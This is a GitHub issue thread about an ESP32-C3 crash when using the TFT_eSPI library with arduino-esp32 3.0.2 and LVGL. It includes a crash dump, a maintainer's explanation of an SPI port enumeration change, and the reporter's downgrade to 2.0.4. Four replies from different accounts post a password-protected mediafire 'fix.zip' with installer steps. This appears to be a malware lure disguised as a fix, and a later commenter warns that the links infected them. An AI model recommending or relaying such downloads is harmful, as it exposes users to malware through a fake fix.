espressif/arduino-esp32 #10254: In version 3.0.2 the TFT_ESPI library is not used correctly and the module restarts repeatedly. LVGL 9.2

43823845, 2024-08-28:
### Board

ESP32-C3

### Device Description

Guru Meditation Error: Core  0 panic'ed (Store access fault). Exception was unhandled.

Core  0 register dump:
MEPC    : 0x420507de  RA      : 0x420507d6  SP      : 0x3fca6d00  GP      : 0x3fc8c600  
TP      : 0x3fc89ce4  T0      : 0xffffffff  T1      : 0xffc3ffff  T2      : 0x00000001
S0/FP   : 0x3fca2bd4  S1      : 0x00000000  A0      : 0x00000000  A1      : 0x00001001
A2      : 0x00000000  A3      : 0x00000001  A4      : 0x08000000  A5      : 0x00000010  
A6      : 0x00000000  A7      : 0x04c4b400  S2      : 0x00000007  S3      : 0x00000001  
S4      : 0x000000a0  S5      : 0x3fc8dd6c  S6      : 0x00000a00  S7      : 0x00000000
S8      : 0x00000000  S9      : 0x00000000  S10     : 0x00000000  S11     : 0x00000000  
T3      : 0x00000000  T4      : 0x0000000f  T5      : 0x003c0000  T6      : 0x00000003
MSTATUS : 0x00001881  MTVEC   : 0x40380001  MCAUSE  : 0x00000007  MTVAL   : 0x00000010  
MHARTID : 0x00000000

If the annotation tft.begin returns to normal, along with the LVGL used it also fails to be referenced, the issue seems to only appear on ESP32-C3

### Hardware Configuration

#define TFT_MOSI 6 // In some display driver board, it might be written as "SDA" and so on.
#define TFT_SCLK 7
#define TFT_CS -1 // Chip select control pin
#define TFT_DC 10 // Data Command control pin
#define TFT_RST 8 // Reset pin (could connect to Arduino RESET pin)

### Version

latest master (checkout manually)

### IDE Name

PlatformIO

### Operating System

WINDOWS11

### Flash frequency

40M

### PSRAM enabled

no

### Upload speed

300000

### Description

Guru Meditation Error: Core  0 panic'ed (Store access fault). Exception was unhandled.

Core  0 register dump:
MEPC    : 0x420507de  RA      : 0x420507d6  SP      : 0x3fca6d00  GP      : 0x3fc8c600  
TP      : 0x3fc89ce4  T0      : 0xffffffff  T1      : 0xffc3ffff  T2      : 0x00000001
S0/FP   : 0x3fca2bd4  S1      : 0x00000000  A0      : 0x00000000  A1      : 0x00001001
A2      : 0x00000000  A3      : 0x00000001  A4      : 0x08000000  A5      : 0x00000010  
A6      : 0x00000000  A7      : 0x04c4b400  S2      : 0x00000007  S3      : 0x00000001  
S4      : 0x000000a0  S5      : 0x3fc8dd6c  S6      : 0x00000a00  S7      : 0x00000000
S8      : 0x00000000  S9      : 0x00000000  S10     : 0x00000000  S11     : 0x00000000  
T3      : 0x00000000  T4      : 0x0000000f  T5      : 0x003c0000  T6      : 0x00000003
MSTATUS : 0x00001881  MTVEC   : 0x40380001  MCAUSE  : 0x00000007  MTVAL   : 0x00000010  
MHARTID : 0x00000000

[... 128 lines cut ...]
3fca6fc0: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fca6fe0: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fca7000: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fca7020: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000101 0x00000000
3fca7040: 0x00000000 0x0000000a 0x3fca75f0 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fca7020: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000101 0x00000000
3fca7040: 0x00000000 0x0000000a 0x3fca75f0 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
3fca7060: 0x00000000 0x00000000 0x00000000 0x3fca709c 0x3fca71f0 0x00000000 0x3fca7460 0x3fca73fc
3fca7080: 0x3fca758c 0x3fca7528 0x3fca74c4 0xbaad5678 0x00000150 0xabba1234 0x00000144 0x3fca70f0
3fca7060: 0x00000000 0x00000000 0x00000000 0x3fca709c 0x3fca71f0 0x00000000 0x3fca7460 0x3fca73fc
3fca7080: 0x3fca758c 0x3fca7528 0x3fca74c4 0xbaad5678 0x00000150 0xabba1234 0x00000144 0x3fca70f0
3fca70a0: 0x3fca70f0 0x3fca71e0 0x3fca71d4 0x00000000 0x3fca70b4 0xffffffff 0x3fca70b4 0x3fca70b4
3fca70c0: 0x00000000 0x3fca70c8 0xffffffff 0x3fca70c8 0x3fca70c8 0x00000000 0x00000014 0x0000000c
3fca70a0: 0x3fca70f0 0x3fca71e0 0x3fca71d4 0x00000000 0x3fca70b4 0xffffffff 0x3fca70b4 0x3fca70b4
3fca70c0: 0x00000000 0x3fca70c8 0xffffffff 0x3fca70c8 0x3fca70c8 0x00000000 0x00000014 0x0000000c
3fca70e0: 0xb400ffff 0x00000000 0xb33fffff 0x00000000 0x4c119aa8 0x3589dff2 0xd90ee067 0x161ee435

3fca70e0: 0xb400ffff 0x00000000 0xb33fffff 0x00000000 0x4c119aa8 0x3589dff2 0xd90ee067 0x161ee435

ELF file SHA256: 755a621bb1a53a86
```

### I have checked existing issues, online documentation and the Troubleshooting Guide

- [X] I confirm I have checked existing issues, online documentation and Troubleshooting guide.

Superstar-IT, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

me-no-dev, 2024-08-28:
That library is known to not work with recent versions of ESP-IDF because of change in enumerating the SPI ports for S3 ad C3 (and probably more). We had the same issue and have it fixed locally, so the library will probably need to do the same.

internet-person, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

internet-person, 2024-08-28:
ignore the fucking links whatever you do, i was patient zero for a digital zombie outbreak

43823845, 2024-08-28:
> That library is known to not work with recent versions of ESP-IDF because of change in enumerating the SPI ports for S3 ad C3 (and probably more). We had the same issue and have it fixed locally, so the library will probably need to do the same.

Thanks for your reply, I am following the downgrade to 2.0.4 , this version works fine!

ZnMnCr, 2024-08-28:
I have another question, I can change the version of the board in ARDUINOIDE, what should I do in platformIO and where should I go to change the version?

Jason2866, 2024-08-28:
@ZnMnCr Not the place to ask general questions about Platformi. Anyways see https://github.com/platformio/platform-espressif32/releases/tag/v6.6.0
not an

lbernstone, 2024-08-28:
> That library is known to not work with recent versions of ESP-IDF because of change in enumerating the SPI ports for S3 ad C3 (and probably more). We had the same issue and have it fixed locally, so the library will probably need to do the same.

Can you point me to that PR or code?  I'll see if I can make a PR for TFT_eSPI.

closed 2025-03-12 by Jason2866